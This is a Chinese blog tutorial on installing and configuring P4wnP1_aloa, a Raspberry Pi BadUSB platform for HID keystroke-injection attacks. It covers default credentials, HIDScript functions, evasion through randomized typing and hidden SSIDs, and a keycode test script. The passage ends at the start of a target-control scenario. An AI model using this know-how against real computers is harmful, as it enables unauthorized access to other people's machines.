<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  
  <title>如何用P4wnP1_aloa进行HID攻击 | 漏断&#39;s Blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="前言 P4wnP1基于树莓派zero (w)，是一个快捷高效的HID攻击平台，可以进行Windows密码破解、HID隐藏信道后门、模块化USB设备模拟等，于2017年2月第一次发布，现在主要开发者已停止对其开发，全力开发它的升级版——P4wnP1_aloa。P4wnP1_aloa也是基于树莓派zero w，与P4wnP1善于高效攻击相比，P4wnP1_aloa更注重HID测试，提供web客户端，调">
<meta name="keywords" content="HID攻击,BadUSB,树莓派">
<meta property="og:type" content="article">
<meta property="og:title" content="如何用P4wnP1_aloa进行HID攻击">
<meta property="og:url" content="http://houwenda.github.io/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/index.html">
<meta property="og:site_name" content="漏断&#39;s Blog">
<meta property="og:description" content="前言 P4wnP1基于树莓派zero (w)，是一个快捷高效的HID攻击平台，可以进行Windows密码破解、HID隐藏信道后门、模块化USB设备模拟等，于2017年2月第一次发布，现在主要开发者已停止对其开发，全力开发它的升级版——P4wnP1_aloa。P4wnP1_aloa也是基于树莓派zero w，与P4wnP1善于高效攻击相比，P4wnP1_aloa更注重HID测试，提供web客户端，调">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/rpi0w.jpg">
<meta property="og:image" content="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/wifi_connect.png">
<meta property="og:image" content="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/attack5.png">
<meta property="og:image" content="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/ssh.png">
<meta property="og:image" content="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/web_client.png">
<meta property="og:image" content="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/trigger.png">
<meta property="og:image" content="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/usb.png">
<meta property="og:image" content="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/wifi.png">
<meta property="og:image" content="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/bluetooth.png">
<meta property="og:image" content="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/network.png">
<meta property="og:image" content="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/generic.png">
<meta property="og:image" content="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/attack0.png">
<meta property="og:image" content="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/attack1.png">
<meta property="og:image" content="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/attack5.png">
<meta property="og:image" content="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/attack2.png">
<meta property="og:image" content="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/attack4.png">
<meta property="og:image" content="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/attack3.png">
<meta property="og:image" content="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/attack8.png">
<meta property="og:image" content="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/attack7.png">
<meta property="og:image" content="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/attack6.png">
<meta property="og:image" content="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/attack9.png">
<meta property="og:updated_time" content="2019-04-22T14:55:51.944Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="如何用P4wnP1_aloa进行HID攻击">
<meta name="twitter:description" content="前言 P4wnP1基于树莓派zero (w)，是一个快捷高效的HID攻击平台，可以进行Windows密码破解、HID隐藏信道后门、模块化USB设备模拟等，于2017年2月第一次发布，现在主要开发者已停止对其开发，全力开发它的升级版——P4wnP1_aloa。P4wnP1_aloa也是基于树莓派zero w，与P4wnP1善于高效攻击相比，P4wnP1_aloa更注重HID测试，提供web客户端，调">
<meta name="twitter:image" content="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/rpi0w.jpg">
  
    <link rel="alternative" href="/atom.xml" title="漏断&#39;s Blog" type="application/atom+xml">
  
  
    <link rel="icon" href="/img/head.jpg">
  
  
      <link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.5.0/animate.min.css">
  
  <link rel="stylesheet" href="/css/style.css">
  <link rel="stylesheet" href="/font-awesome/css/font-awesome.min.css">
  <link rel="apple-touch-icon" href="/apple-touch-icon.png">
  
  
  <!-- 加载特效 -->
    <script src="/js/pace.js"></script>
    <link href="/css/pace/pace-theme-flash.css" rel="stylesheet">
  <script>
      var yiliaConfig = {
          rootUrl: '/',
          fancybox: false,
          animate: true,
          isHome: false,
          isPost: true,
          isArchive: false,
          isTag: false,
          isCategory: false,
          open_in_new: false
      }
  </script>
</head></html>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            
            <img lazy-src="/img/head.jpg" class="js-avatar">
            
        </a>

        <hgroup>
          <h1 class="header-author"><a href="/" title="Hi Mate">漏断</a></h1>
        </hgroup>

        
        
        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">首页</a></li>
                        
                            <li><a href="/archives">文章列表</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fl mail" target="_blank" href="http://mail.qq.com/cgi-bin/qm_share?t=qm_mailme&email=n6impqaorK2rq9-u7rH88PI" title="mail">mail</a>
                            
                                <a class="fl github" target="_blank" href="https://github.com/houwenda" title="github">github</a>
                            
                                <a class="fl zhihu" target="_blank" href="#" title="zhihu">zhihu</a>
                            
                                <a class="fl weibo" target="_blank" href="#" title="weibo">weibo</a>
                            
                                <a class="fl google" target="_blank" href="#" title="google">google</a>
                            
                                <a class="fl twitter" target="_blank" href="#" title="twitter">twitter</a>
                            
                                <a class="fl linkedin" target="_blank" href="#" title="linkedin">linkedin</a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <a href="/tags/BadUSB/" style="font-size: 10px;">BadUSB</a> <a href="/tags/HID攻击/" style="font-size: 10px;">HID攻击</a> <a href="/tags/PHP/" style="font-size: 16.67px;">PHP</a> <a href="/tags/Python/" style="font-size: 10px;">Python</a> <a href="/tags/environments/" style="font-size: 16.67px;">environments</a> <a href="/tags/shell/" style="font-size: 13.33px;">shell</a> <a href="/tags/出题笔记/" style="font-size: 10px;">出题笔记</a> <a href="/tags/学习打卡/" style="font-size: 20px;">学习打卡</a> <a href="/tags/树莓派/" style="font-size: 10px;">树莓派</a> <a href="/tags/格式转换/" style="font-size: 10px;">格式转换</a> <a href="/tags/踩坑记录/" style="font-size: 10px;">踩坑记录</a> <a href="/tags/速查备忘/" style="font-size: 13.33px;">速查备忘</a> <a href="/tags/题解/" style="font-size: 13.33px;">题解</a>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://www.ltfnjust.club/">LTF</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://104.224.167.8/dokuwiki/doku.php?id=start">TP0t</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://xlor.cn">XLor</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://einsturing.top/">Einsturing</a>
                    
                    </div>
                </section>
                

                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">Web狗一枚，现就读南京理工大学，安全爱好者</div>
                </section>
                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="Me">漏断</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                
                    <img lazy-src="/img/head.jpg" class="js-avatar">
                
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="Me">漏断</a></h1>
            </hgroup>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">首页</a></li>
                
                    <li><a href="/archives">文章列表</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                <div class="social">
                    
                        <a class="mail" target="_blank" href="http://mail.qq.com/cgi-bin/qm_share?t=qm_mailme&email=n6impqaorK2rq9-u7rH88PI" title="mail">mail</a>
                    
                        <a class="github" target="_blank" href="https://github.com/houwenda" title="github">github</a>
                    
                        <a class="zhihu" target="_blank" href="#" title="zhihu">zhihu</a>
                    
                        <a class="weibo" target="_blank" href="#" title="weibo">weibo</a>
                    
                        <a class="google" target="_blank" href="#" title="google">google</a>
                    
                        <a class="twitter" target="_blank" href="#" title="twitter">twitter</a>
                    
                        <a class="linkedin" target="_blank" href="#" title="linkedin">linkedin</a>
                    
                </div>
            </nav>
        </header>                
    </div>
</nav>
      <div class="body-wrap"><article id="post-hid-attack-with-P4wnP1-a-l-o-a" class="article article-type-post" itemscope="" itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/" class="article-date">
      <time datetime="2019-01-22T00:45:45.000Z" itemprop="datePublished">2019-01-22</time>
</a>
    </div>
  
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      如何用P4wnP1_aloa进行HID攻击
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        
    <div class="article-category tagcloud">
    <a class="article-category-link" href="/categories/LTF/">LTF</a>
    </div>


        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/BadUSB/">BadUSB</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/HID攻击/">HID攻击</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/树莓派/">树莓派</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><blockquote>
<p><a href="https://github.com/mame82/P4wnP1" target="_blank" rel="noopener">P4wnP1</a>基于树莓派zero (w)，是一个快捷高效的HID攻击平台，可以进行Windows密码破解、HID隐藏信道后门、模块化USB设备模拟等，于2017年2月第一次发布，现在主要开发者已停止对其开发，全力开发它的升级版——<a href="https://github.com/mame82/P4wnP1_aloa" target="_blank" rel="noopener">P4wnP1_aloa</a>。P4wnP1_aloa也是基于树莓派zero w，与P4wnP1善于高效攻击相比，P4wnP1_aloa更注重HID测试，提供web客户端，调整、配置更加方便。P4wnP1一次可以模拟8个HID设备，包括键盘、鼠标等。同时，P4wnP1_aloa使用的HIDscript基于JavaScript，无论是自定义脚本还是对RubberDucky的脚本进行改写都很方便。P4wnP1_aloa还可以通过自定义输入速度，随机时间间隔，更好的模拟人工操作，欺骗防护机制。<br>截止至本篇发表日期，P4wnP1_aloa的最新发布版本为2018年12月发布的v0.1.0-alpha2，相关信息见<a href="https://github.com/mame82/P4wnP1_aloa/releases" target="_blank" rel="noopener">releases</a>。由于软件尚处于开发初期，国内外资料较少，本篇基于笔者的实践对P4wnP1_aloa进行介绍，想要更深入的了解P4wnP1_aloa可以阅读官方README<a href="https://github.com/mame82/P4wnP1_aloa/blob/master/README.md" target="_blank" rel="noopener">链接</a>,笔者也是主要根据README对其操作进行的学习。<br><a id="more"></a></p>
</blockquote>
<hr>
<h2 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h2><p>首先到P4wnP1_aloa的<a href="https://github.com/mame82/P4wnP1_aloa/releases" target="_blank" rel="noopener">releases页面</a>下载镜像文件。P4wnP1的系统基于Raspbian，而P4wnP1_aloa则基于kali，内置了很多安全工具（kali的<a href="https://www.offensive-security.com/kali-linux-arm-images/" target="_blank" rel="noopener">官方下载页</a>也有P4wnP1镜像，但要注意是原版P4wnP1，而非本篇介绍的P4wnP1_aloa）。</p>
<p>解压压缩文件，用Etcher或win32DiskImager（笔者使用的是Etcher）将得到的img镜像文件写入micro SD卡（8G够用）。</p>
<p>将micro SD卡插入树莓派zero w，电源连接标有PWR（远离CPU的那个）的usb接口，指示灯闪烁表明上电成功。<br><img src="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/rpi0w.jpg" alt="image"></p>
<p>电脑或手机查看WIFI热点，若出现名字中含有P4wnP1的热点则启动完成。连接热点，密码MaMe82-P4wnP1。<br>由于P4wnP1_aloa只是起了一个WiFi热点，没有真正接入互联网，因此会提示无网络。电脑连接建议使用两个网卡，一个用来连接P4wnP1_aloa，另一个访问Internet。<br><img src="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/wifi_connect.png" alt="image"></p>
<p>连接完成后可以通过浏览器访问 <a href="http://172.24.0.1:8000" target="_blank" rel="noopener">http://172.24.0.1:8000</a> 进入P4wnP1_aloa的web控制界面（<em>注意关闭代理，否则无法访问</em>）。也可以通过172.24.0.1的22端口进行ssh连接，默认用户名root，密码toor。<br><img src="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/attack5.png" alt="image"></p>
<p><img src="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/ssh.png" alt="image"></p>
<p>P4wnP1_aloa的安装至此结束。</p>
<hr>
<h2 id="使用"><a href="#使用" class="headerlink" title="使用"></a>使用</h2><h3 id="web端"><a href="#web端" class="headerlink" title="web端"></a>web端</h3><p>P4wnP1_aloa的web端实现了大部分功能（比ssh端能做的还要多！）下面依次介绍各模块（作者称之为模板template）。</p>
<h5 id="HIDScript"><a href="#HIDScript" class="headerlink" title="HIDScript"></a>HIDScript</h5><p><img src="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/web_client.png" alt="image"></p>
<p>基于JavaScript，可以在提供的编辑器中进行修改、保存、加载已保存的脚本。内置一些控制函数。<br><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">layout(<span class="string">'us'</span>); <span class="comment">//键盘布局，国内一般us</span></span><br><span class="line">typingSpeed(标准间隔,随机值); <span class="comment">//ms为单位，每个操作间的时间间隔</span></span><br><span class="line">delay(时间值); <span class="comment">//ms为单位，等待一定时间</span></span><br><span class="line">type(<span class="string">'xxxxx\n'</span>); <span class="comment">//输入字符串，注意是敲击按键，大小写无保证</span></span><br><span class="line">press(<span class="string">'GUI X'</span>); <span class="comment">//按下按键再自动松开 </span></span><br><span class="line">moveStepped(x,y); <span class="comment">//鼠标相对运动</span></span><br><span class="line">moveTo(x,y); <span class="comment">//鼠标移动到绝对位置</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">fun</span>(<span class="params"></span>) </span>&#123; </span><br><span class="line">    <span class="comment">//定义函数</span></span><br><span class="line">&#125;</span><br><span class="line">waitLEDRepeat(NUM);	<span class="comment">//等待连按num lock键，可以识别CAPS等按键，实现逻辑控制</span></span><br></pre></td></tr></table></figure></p>
<p>有了HIDscript，可以很方便的把RubberDucky的脚本迁移到P4wnP1_aloa平台上。但尚且无法完成BashBunny的很多功能，下文将进一步介绍如何通过master template实现BashBunny的大部分功能。</p>
<h5 id="Trigger-Action"><a href="#Trigger-Action" class="headerlink" title="Trigger Action"></a>Trigger Action</h5><p><img src="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/trigger.png" alt="image"></p>
<p>触发机制，通过一项事件触发一项或多项操作。</p>
<p>触发条件包括：服务启动、USB连接、USB断开、WIFI热点启动、连接已有热点、GPOI输入等。其中GPOI输入是利用了树莓派的特点定制的。</p>
<p>执行事件包括：打印log、（kali系统）运行bash脚本、运行HIDScript、加载并部署模板、GPIO输出等。</p>
<p>配置全部以下拉选项提供给用户，避免了错误输入带来的效率降低，也更加直观易读。</p>
<p>One shot设定，开启后触发机制只触发一次，随后不再触发。</p>
<h5 id="USB-Settings"><a href="#USB-Settings" class="headerlink" title="USB Settings"></a>USB Settings</h5><p><img src="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/usb.png" alt="image"></p>
<p>进行USB设置，包括销售商ID、制作者ID、产品ID、序列号等。</p>
<p>还可对模拟的项目进行选择，包括CDC ECM（针对UNIX Linux OSX的USB网络）、RNDIS（针对Windows的USB网络）、键盘、鼠标、一般USB设备、序列化接口、存储设备（模拟大小、名称等需要通过ssh端进行设定）。</p>
<h5 id="WIFI-Settings"><a href="#WIFI-Settings" class="headerlink" title="WIFI Settings"></a>WIFI Settings</h5><p><img src="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/wifi.png" alt="image"></p>
<p>设定WIFI名称、信道、加密、地区、工作模式（AP或客户端）、是否隐藏SSID（在长期攻击中比较有用，能发现隐藏热点的目标一般也很容易发现正受到HID攻击）</p>
<h5 id="Bluetooth-Settings"><a href="#Bluetooth-Settings" class="headerlink" title="Bluetooth Settings"></a>Bluetooth Settings</h5><p><img src="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/bluetooth.png" alt="image"></p>
<p>蓝牙设置，目前没怎么用到，对连接设备限制比较大，且效率没有WIFI高</p>
<h5 id="Network-Settings"><a href="#Network-Settings" class="headerlink" title="Network Settings"></a>Network Settings</h5><p><img src="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/network.png" alt="image"></p>
<p>网络设置，可以设定网卡、工作模式、DHCP服务等</p>
<h5 id="Event-Log"><a href="#Event-Log" class="headerlink" title="Event Log"></a>Event Log</h5><p>事件日志，在测试配置时可以检查trigger条件是否被触发，注意刷新页面时会重置</p>
<h5 id="Generic-Settings"><a href="#Generic-Settings" class="headerlink" title="Generic Settings"></a>Generic Settings</h5><p><img src="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/generic.png" alt="image"></p>
<p>以上各种设定可以保存到文件，并在后面的使用中直接套用，因此作者称之为template（模板），Generic Settings则可以对这些模板进行管理，直接部署。此外，在这项设置中还可以将不同模板的组合方式单独保存，形成作者所说的master template（主模板），进行一键部署，实现类似BashBunny的功能（BashBunny是将系统层的配置和HID攻击命令写在同一个脚本中，P4wnP1_aloa则通过模块组合实现）。</p>
<p>每次开机时加载的模板就是master template，也可以在Generic Settings中进行设置。</p>
<p>一定要检查WIFI模板的配置，防止无法连接。</p>
<p>备份与恢复功能，通过数据库进行备份、恢复。</p>
<h3 id="ssh端"><a href="#ssh端" class="headerlink" title="ssh端"></a>ssh端</h3><h5 id="存储位置"><a href="#存储位置" class="headerlink" title="存储位置"></a>存储位置</h5><p>HIDScript：/root/P4wnP1/dist/HIDScripts</p>
<p>CD-ROM的模拟文件：/root/P4wnP1/dist/ums/cdrom</p>
<p>USB存储设备的模拟文件：/root/P4wnP1/dist/ums/flashdrive</p>
<p>生成USB存储设备：/root/P4wnP1/dist/helper/genimg</p>
<p>备份数据库：/root/P4wnP1/dist/db</p>
<p>bash脚本（Trigger里可选操作）：/root/P4wnP1/dist/scripts</p>
<h5 id="P4wnP1-cli"><a href="#P4wnP1-cli" class="headerlink" title="P4wnP1_cli"></a>P4wnP1_cli</h5><p><code>P4wnP1_cli led -b 数字</code>设定指示灯闪烁频率</p>
<p>其他指令直接<code>P4wnP1_cli -h</code>查看帮助。因为操作基本可以通过web端进行，ssh端有些设置只能一次性修改，不能保存，这里不详述。</p>
<hr>
<h2 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h2><p>P4wnP1_aloa利用Linux内核的一项功能模拟成为USB Gadget，进行操作。以下是利用P4wnP1_aloa已有配置进行的USB键盘模拟实验。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line">查看实现USB模拟的文件结构</span><br><span class="line">root@kali:~# cd /sys/kernel/config/usb_gadget</span><br><span class="line"></span><br><span class="line">root@kali:/sys/kernel/config/usb_gadget# ls</span><br><span class="line">mame82_gadget</span><br><span class="line"></span><br><span class="line">root@kali:/sys/kernel/config/usb_gadget# cd mame82_gadget/</span><br><span class="line"></span><br><span class="line">root@kali:/sys/kernel/config/usb_gadget/mame82_gadget# ls -l #</span><br><span class="line">total 0</span><br><span class="line">-rw-r--r-- 1 root root 4096 Dec 14 14:40 UDC</span><br><span class="line">-rw-r--r-- 1 root root 4096 Dec 14 14:40 bDeviceClass</span><br><span class="line">-rw-r--r-- 1 root root 4096 Dec 14 14:40 bDeviceProtocol</span><br><span class="line">-rw-r--r-- 1 root root 4096 Dec 14 14:40 bDeviceSubClass</span><br><span class="line">-rw-r--r-- 1 root root 4096 Dec 14 16:26 bMaxPacketSize0</span><br><span class="line">-rw-r--r-- 1 root root 4096 Dec 14 14:40 bcdDevice</span><br><span class="line">-rw-r--r-- 1 root root 4096 Dec 14 14:40 bcdUSB</span><br><span class="line">drwxr-xr-x 3 root root    0 Dec 14 14:40 configs</span><br><span class="line">drwxr-xr-x 6 root root    0 Dec 14 14:40 functions</span><br><span class="line">-rw-r--r-- 1 root root 4096 Dec 14 14:40 idProduct</span><br><span class="line">-rw-r--r-- 1 root root 4096 Dec 14 14:40 idVendor</span><br><span class="line">drwxr-xr-x 2 root root    0 Dec 14 14:40 os_desc</span><br><span class="line">drwxr-xr-x 3 root root    0 Dec 14 14:40 strings</span><br><span class="line"></span><br><span class="line">root@kali:/sys/kernel/config/usb_gadget/mame82_gadget#cd configs/</span><br><span class="line"></span><br><span class="line">root@kali:/sys/kernel/config/usb_gadget/mame82_gadget/configs# ls</span><br><span class="line">c.1</span><br><span class="line"></span><br><span class="line">root@kali:/sys/kernel/config/usb_gadget/mame82_gadget/configs# cd c.1</span><br><span class="line"></span><br><span class="line">root@kali:/sys/kernel/config/usb_gadget/mame82_gadget/configs/c.1# ls -l</span><br><span class="line">total 0</span><br><span class="line">-rw-r--r-- 1 root root 4096 Dec 14 14:40 MaxPower</span><br><span class="line">-rw-r--r-- 1 root root 4096 Dec 14 14:40 bmAttributes</span><br><span class="line">lrwxrwxrwx 1 root root    0 Dec 14 14:40 ecm.usb1 -&gt; ../../../../usb_gadget/mame82_gadget/functions/ecm.usb1</span><br><span class="line">lrwxrwxrwx 1 root root    0 Dec 14 14:40 hid.keyboard -&gt; ../../../../usb_gadget/mame82_gadget/functions/hid.keyboard</span><br><span class="line">lrwxrwxrwx 1 root root    0 Dec 14 14:40 hid.mouse -&gt; ../../../../usb_gadget/mame82_gadget/functions/hid.mouse</span><br><span class="line">lrwxrwxrwx 1 root root    0 Dec 14 14:40 rndis.usb0 -&gt; ../../../../usb_gadget/mame82_gadget/functions/rndis.usb0</span><br><span class="line">drwxr-xr-x 3 root root    0 Dec 14 14:40 strings</span><br></pre></td></tr></table></figure>
<p>以上是P4wnP1_aloa实现USB设备模拟的文件配置，Web端USB Settings里进行的设置都会对这里的文件进行修改。可以看到键盘模拟是开启的，接下来看如何模拟键盘输入。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">root@kali:/sys/kernel/config/usb_gadget/mame82_gadget# cd /dev</span><br><span class="line"></span><br><span class="line">root@kali:/dev# file /dev/hidg0</span><br><span class="line">/dev/hidg0: character special (243/0)</span><br><span class="line"></span><br><span class="line">root@kali:/dev#</span><br></pre></td></tr></table></figure>
<p>将树莓派上标有USB的USB接口连接到电脑，将光标置于一个可输入文本的地方（比如记事本，如果连接的是用来ssh连接的电脑可以忽略）。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">root@kali:/dev# echo -ne &quot;\x00\x00\x00\x17\x00\x00\x00\x00&quot; &gt; /dev/hidg0</span><br><span class="line"># echo -n 不自动换行</span><br><span class="line"># echo -e 开启转义</span><br></pre></td></tr></table></figure></p>
<p>如果不停的输出一大堆t则测试成功（断开USB连接后停止），但是只键入了一个keycode，为什么会不停输出呢？这是因为只输入了按下按键的信号，却没有弹起按键的信号，这就相当于按住键盘的T键不放，直到拔下键盘。</p>
<p>已知弹起键盘的KeyCode为”\x00\x00\x00\x00\x00\x00\x00\x00”，则可以通过写一个shell脚本进行测试<br><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span>!/bin/bash</span><br><span class="line">sleep 3</span><br><span class="line">for keycode in &#123;10..25&#125;</span><br><span class="line">do</span><br><span class="line">	echo -ne "\x00\x00\x00\x$&#123;keycode&#125;\x00\x00\x00\x00" &gt; /dev/hidg0</span><br><span class="line">       	echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00" &gt; /dev/hidg0</span><br><span class="line">	sleep 0.2</span><br><span class="line">done</span><br></pre></td></tr></table></figure></p>
<p>上面的脚本实现的效果：等待3秒后依次按下mnopqrstuv345678，按键间隔0.2秒。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~# chmod +x test.sh</span><br><span class="line">root@kali:~# ./test.sh</span><br><span class="line">mnopqrstuv345678root@kali:~# mnopqrstuv345678</span><br></pre></td></tr></table></figure></p>
<hr>
<h2 id="实战"><a href="#实战" class="headerlink" title="实战"></a>实战</h2><h3 id="场景1"><a href="#场景1" class="headerlink" title="场景1"></a>场景1</h3><p>同一局域网内（外网也行）控制目标电脑。</p>
